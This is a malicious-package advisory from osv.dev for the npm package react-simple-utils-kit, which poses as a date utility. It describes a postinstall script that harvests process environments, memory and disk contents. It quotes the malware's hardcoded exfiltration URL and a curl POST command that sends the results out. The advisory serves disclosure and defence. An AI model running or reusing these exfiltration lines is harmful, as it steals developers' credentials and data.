react-simple-utils-kit @1.4.2
Vulnerability report · Last retrieved from osv.dev June 24, 2026 at 6:36 AM UTC
OSV ID: MAL-2026-6303
Ecosystem: npm

Summary
The package advertises itself as 'a simple date formatting utility for React projects' (a 3-function index.js), but ships a postinstall.js that runs on every npm install and performs an extensive reconnaissance and credential-harvest sweep against the installer's host, POSTing each result over plain HTTP to a hardcoded attacker endpoint at http://2e3bkumw.requestrepo.com (a one-shot request-interception domain unrelated to any legitimate publisher). postinstall.js:8 hardcodes `const BURL = 'http://2e3bkumw.requestrepo.com'`, and postinstall.js:16 invokes `execSync(\`curl -s -m 8 -X POST -d @${tmpFile} ${BURL}/${key}...\`)` to ship the results.

Collected data includes:
- process capabilities and ptrace scope
- an strace attach against PID 2
- raw memory reads of another process via `xxd /proc/2/mem`
- that process's environment block via `cat /proc/2/environ` (commonly containing CI tokens and cloud credentials)
- `/proc/2/cmdline` and `ps aux` output
- listening-port enumeration
- MCP probing on localhost:9000
- raw-disk reads from `/dev/vdb`

The package's name targets React developers via a date-utility cover story (empty author field; Chinese comment 绕过能力探测 = 'capability-detection bypass'); none of this behavior is consistent with the advertised purpose. Installer harm is concrete and immediate: any host running `npm install react-simple-utils-kit` leaks process-tree secrets, environment variables of other running processes, kernel/container introspection data, and raw block-device contents to attacker infrastructure.
Source: amazon-inspector (038aa6bccd8008fec1f309d718e53dd4b89e4ca15a976c6a80652e0dd58a5b58)